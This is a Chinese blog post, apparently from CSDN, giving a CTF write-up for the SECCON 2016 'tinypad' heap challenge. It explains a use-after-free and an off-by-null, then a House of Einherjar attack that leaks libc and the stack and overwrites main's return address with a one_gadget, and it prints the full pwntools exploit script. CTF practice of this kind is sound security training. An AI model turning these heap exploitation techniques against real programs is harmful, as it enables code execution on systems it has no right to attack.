[house of einherjar] tinypad

最新推荐文章于 2023-11-20 19:37:00 发布
最新推荐文章于 2023-11-20 19:37:00 发布
阅读量164 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/117327507
版权

[house of einherjar] tinypad

1. Ida 分析

  1. 程序直接显示chunk中的内容,相当于show了

在这里插入图片描述

  1. delete存在uaf

    在这里插入图片描述

  2. edit函数,tinypad缓冲区读入数据

    在这里插入图片描述

  3. add函数,只能申请4个chunk,使用read_until读入

    在这里插入图片描述

  4. read_until存在off by null

    在这里插入图片描述

2. 思路

  • 条件总结,存在可编辑的数组,存在off by null,chunk中的数据没法轻易的修改(strcpy \x00截断了),可以使用house of einherjar,此外free之后没有置NULL,存在uaf,可以泄漏相关的地址

  1. 首先,通过fastbin泄漏heap的地址,以及unstored bin泄漏libc的地址

    # leak libc and heap_base
add(0x70,'b'*0x70)
add(0x70,'b'*0x70)
add(0xf0,'c'*0xf0)
add(0xf0,'d'*0x90)
delete(2)
delete(1)
# heap_addr show in fast bin
p.recvuntil('CONTENT: ')
heap_base = uu64(p.recvline().rstrip()) - 0x80
delete(3)
#libc_addr show in unstored bin
main_88 =  uu64(p.recvuntil('\x7f')[-6:]) 
libc_base = main_88 - 88 - 0x3c4b20
leak("libc_base",libc_base)
leak("heap_base",heap_base)
delete(4)

  2. 用house of einherjar,实现地址写

    1. 明确fake chunk在tinypad+0x20处(前面空0x20一方面是流出缓冲区方便修改,不会破坏fakechunk的head,另一方面,由于最多申请256字节,要能够使fake覆盖到chunk1、2的指针)

    2. 计算fakechunk与chunk2的距离,方便构造chunk2的presize

      # house of einherjar
add(0x10,'A'*0x10)
# set chunk2's size,void check
add(0x100,'B'*0xf8 + p64(0x101))
add(0x100,'C'*0xf0)
add(0x100,'D'*0xf0)

# solve the offset between fakechunk and curchunk(chunk2)
tinypad = 0x602040
# fake is editable, use edit to modify it
fakechunk = tinypad + 0x20
offset = heap_base + 0x20 -fakechunk 
leak("offet",offset)
# create leagal fakechunk
payload = 'D'*0x20 + p64(0) + p64(0x101) + p64(fakechunk)*2
edit(3,payload)

      在这里插入图片描述

      在这里插入图片描述

    3. 通过off by one,覆盖chunk2的preinuse为\x00,delete(2)触发

      delete(1)
# set chunk2's presize offset
add(0x18,'a'*0x10+p64(offset))
# triger houses of einherjar
delete(2)
debug()
# modify fakechunk's head
edit(4,'d'*0x20 + p64(0)+p64(0x101) + p64(main_88)*2)
debug()

      在这里插入图片描述

  3. 通过fakechunk中编辑的指针修改main_ret为one(这里不用mallochook是因为往目标chunk读入数据时,是通过原来里面的strlen长度决定的,而malochook原本是\x00,因此没法读入)

    1. 这里的修改,寻在先泄漏,再修改,故需要能够往地址写入的构造

    2. 第一次泄漏完,利用chunk2,往chunk1,写入main_ret的地址

      one_gadget_addr = libc_base + 0xf1247
environ_pointer = libc_base + libc.symbols['__environ']
# change point of chunk1 and chunk2
# leak environ_pointer_addr 
padding = 'f'*0xd0 + 'a'*8 + p64(environ_pointer) + 'a'*8 + p64(0x602148)
add(0xf0,padding)
ru('CONTENT: ')
main_ret = uu64(p.recvline().rstrip()) - 0x8*30
leak("main_ret",main_ret)
edit(2,p64(main_ret))

      在这里插入图片描述

      在这里插入图片描述

    3. 再通过修改chunk1,修改main_ret为one

      edit(1,p64(one_gadget_addr))

      在这里插入图片描述

3. exp

#!/usr/bin/env python
# coding=utf-8
# Author : huzai24601
from pwn import *
from LibcSearcher import *
#context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context(arch='amd64',os='linux',log_level='debug')
myelf = ELF('./tinypad')
p=process(myelf.path)
libc  = ELF('/lib/x86_64-linux-gnu/libc.so.6')
s=lambda data :p.send(data)
sa=lambda delim,data :p.sendafter(delim, data)
sl=lambda data :p.sendline(data)
sla=lambda delim,data :p.sendlineafter(delim, data) 
r=lambda numb=4096 :p.recv(numb)
ru=lambda delims :p.recvuntil(delims)
uu64=lambda data :u64(data.ljust(8,'\x00'))
leak=lambda name,addr :log.success('{} : {:#x}'.format(name, addr))
def debug():
    gdb.attach(p)
    pause()

def add(size,cont):
    sla('(CMD)>>> ','a')
    sla('(SIZE)>>> ',str(size))
    sla('(CONTENT)>>> ',cont)

def edit(index,cont):
    sla('(CMD)>>> ','e')
    sla('(INDEX)>>> ',str(index))
    sla('(CONTENT)>>> ',cont)
    sla('(Y/n)>>> ','Y')

def delete(index):
    sla('(CMD)>>> ','D')
    sla('(INDEX)>>> ',str(index))

# leak libc and heap_base
add(0x70,'b'*0x70)
add(0x70,'b'*0x70)
add(0xf0,'c'*0xf0)
add(0xf0,'d'*0x90)
delete(2)
delete(1)
# heap_addr show in fast bin
p.recvuntil('CONTENT: ')
heap_base = uu64(p.recvline().rstrip()) - 0x80
delete(3)
#libc_addr show in unstored bin
main_88 =  uu64(p.recvuntil('\x7f')[-6:]) 
libc_base = main_88 - 88 - 0x3c4b20
leak("libc_base",libc_base)
leak("heap_base",heap_base)
delete(4)


# house of einherjar
add(0x10,'A'*0x10)
# set chunk2's size,void check
add(0x100,'B'*0xf8 + p64(0x101))
add(0x100,'C'*0xf0)
add(0x100,'D'*0xf0)

# solve the offset between fakechunk and curchunk(chunk2)
tinypad = 0x602040
# fake is editable, use edit to modify it
fakechunk = tinypad + 0x20
offset = heap_base + 0x20 -fakechunk 
leak("offet",offset)
# create leagal fakechunk
payload = 'D'*0x20 + p64(0) + p64(0x101) + p64(fakechunk)*2
edit(3,payload)
delete(1)
# set chunk2's presize offset
add(0x18,'a'*0x10+p64(offset))
# triger houses of einherjar
delete(2)
debug()
# modify fakechunk's head
edit(4,'d'*0x20 + p64(0)+p64(0x101) + p64(main_88)*2)
debug()

one_gadget_addr = libc_base + 0xf1247
environ_pointer = libc_base + libc.symbols['__environ']
# change point of chunk1 and chunk2
# leak environ_pointer_addr 
padding = 'f'*0xd0 + 'a'*8 + p64(environ_pointer) + 'a'*8 + p64(0x602148)
add(0xf0,padding)
ru('CONTENT: ')
main_ret = uu64(p.recvline().rstrip()) - 0x8*30
leak("main_ret",main_ret)
# modify chunk1's point to main_ret 
edit(2,p64(main_ret))
# modify main_ret to onegadget
edit(1,p64(one_gadget_addr))
p.interactive()
huzai9527
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2016 Seccon tinypad
yms0211的博客
09-26 430
house of Einherjar练习题
house-of-einherjar-tinypad
csdn546229768的博客
01-19 428
题目 : secconctf2016_tinypad 保护 分析 add部分: edit部分: dele部分: 自带的show部分: 其中堆块信息保存在tinypad[0x100]处理解图如下: 思路 上面ida分析的注释中对应解释了程序漏洞所在,那么首先进行libc泄露,首先malloc 4个chunk其中 chunkA : 必须为unsort bin 且size必须是8(十六进制)结尾,因为如果malloc 0xe8 ----真实大小—> 0xf0 这时可以写入的数据为0xe8 通过
魔兽世界编程宝典读书笔记(8)
默然说话
12-07 3055
<br /> 第8章             魔兽世界编程概述现在该在游戏中创建对你自己有意义的插件了。本章将介绍独立程序运行环境和魔兽世界客户端内部运行环境之间的区别,向您指出Blizzard提供的资源和资料,并介绍许多当您创建自己的插件时很有用的插件。8.1        游戏中运行和测试代码在魔兽世界里运行代码与在游戏的外面运行代码有很大不同,尤其是print()函数在游戏里并不存在,这是由于在游戏里面没有Lua解释程序来输出给定的文本。你可以借助WowLua插件进行修正,或者你也可以自己定义一个pr
《魔兽世界插件》教程---21点扑克游戏 Blackjack
maozhuxigood
03-24 476
1.效果图 因为我是新手,只能做一个非常简单的插件,21点扑克游戏。比较有趣吧,插件也可以做一个游戏?游戏中的游戏! 2.编写魔兽世界插件准备 首先你要一个最新的魔兽世界客户端,我的有26G大小。记得要申请一个试玩账户,试玩账户不会消耗游戏时间,可不能用正常账户,那调试代码烧点卡烧的厉害! 用什么编辑器呢?魔兽世界插件大部分是Lua,一部分是XML,SciTE比较适合Lua,但我感...
Tinypad Seccon CTF 2016(House Of Einherjar)
Bill
04-18 1285
Tinypad Seccon CTF 2016(House Of Einherjar) 序言 随着对how2heap的学习, 难度也是越来越大, 改革进入了深水区. 程序运行 1.菜单 | [A] Add memo | | [D] Delet...
House Of Einherjar
最新发布
qq_61670993的博客
11-20 159
house of Einherjar
House of einherjar
tbsqigongzi的博客
07-31 476
释放堆块时,unlink后向合并堆块,强制使得malloc返回一个几乎任意地址的chunk。free函数中的后向合并核心操作如下后向合并时,新的chunk的位置取决于chunk_at_offset(p,-((long)prevsize))
Einherjar.rebootstrap:PowerPC Mac的操作系统
02-04
Einherjar.rebootstrap是一款专为PowerPC架构的Mac电脑设计的操作系统项目。PowerPC是IBM、Motorola和Apple联合开发的一种高性能处理器架构,曾在20世纪90年代末至21世纪初被广泛应用于Apple的Macintosh计算机。随着...
Einherjar.tmp:PowerPC Mac的操作系统
05-24
艾因哈尔(Einherjar)-ᛖᛁᚾᚺᛖᚱᛃᚨᚱ PowerPC Mac的操作系统。 曾经有鼓舞人心的 如果没有将它们传递给您,请进行一次时差旅行或购买一些东西。 但是,如果不能,请使用qemu进行测试。 地位 该OS项目基于...
Einherjar:用于amd64和PowerPC Mac的colorForth计算环境
02-03
$ cd Einherjar/kernel $ make all 步骤3:使用qemu运行(通过使用4Mb的RAM和生成的ISO映像) $ qemu-system-i386 -m 4 -cdrom ../build/roentgenium.iso 步骤4:如果需要,请清理构建 $ make clean
Heap Exploitation(简体中文)1
08-03
- House of Spirit、House of Lore、House of Force、House of Einherjar:是经典的堆利用技术,涉及堆内存的精确控制和操纵,以实现任意代码执行。 0x6 安全编码指南: 这部分内容可能包含如何避免上述漏洞的编码...
heap-exploitation.pdf
02-01
- **House of Einherjar**:一种复杂的利用方法,涉及多个内存块的精细控制。 #### 安全编码指导原则 - **避免使用不安全的函数**:例如使用`strdup`替代`strcpy`等。 - **验证输入数据**:确保所有外部输入都经过...
ctf-pwn-patchelf-用题目给的libc运行二进制文件
huzai9527的博客
07-07 5380
用给定的libc进行调试 首先根据题目给你的libc,查找相应版本的连接器 然后去glibc-all-in-one中下载相应的ld文件 glibc-all-in-one安装步骤 https://github.com/matrix1001/glibc-all-in-one 使用 查看各unbuntu版本的glibc ./update_list cat list 下载对应版本的glibc ./download 2.27-3ubuntu1_amd64 下载好的glibc在l
[_IO_FILE] 原理解析
huzai9527的博客
11-10 3712
FSOP CFF-WIKI中有如下描述 FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。 触发条件 梳理一下 FSOP 利用的条件,首先需
IDA修复跳表
huzai9527的博客
11-08 1966
一、 IDA打开遇到JUMP CS命令 这是由于GCC在编译超过5个switch的结构时会用跳表进行优化,变成上面的样子 二、使用EDIT --> other --> specify switch 将光标打在JUMP命令上按TAB键切换到汇编,然后才能进行编辑 我解释一下各个参数的意义 Address of Jump table:跳表的地址,cmp eax 5,之后跳到的地址,这里就是0x69E0 Number of elements:switch 的个数,先前cmp eax 5,加
orw_shellcode_模板
huzai9527的博客
05-23 1582
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
glibc中free函数详解
huzai9527的博客
05-27 917
__libc_free详解(tcache 略) 1. 检查是否存在 hook函数,如果有就执行 void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ /* 1. 关于__free_hook,释放时会检查其会否为NULL,否的话就执行相应的函数 2. __free_hook指向的函数,其调用的参数,为chunk中的内容
ubuntu 18 CTF 环境搭建
huzai9527的博客
05-17 817
ubuntu 18 CTF 环境搭建 一、换源 sudo gedit /etc/apt/sources.list 将下面的内容替换文件内容 # 中科大源 deb https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse deb
深入理解堆内存与 heap 漏洞利用
5. House of Spirit、House of Lore、House of Force和House of Einherjar:这些都是堆溢出攻击的经典技术,通过不同的手段来操控堆内存,达到代码执行或权限提升的目的。 最后,书中提到了安全编码指南,旨在帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值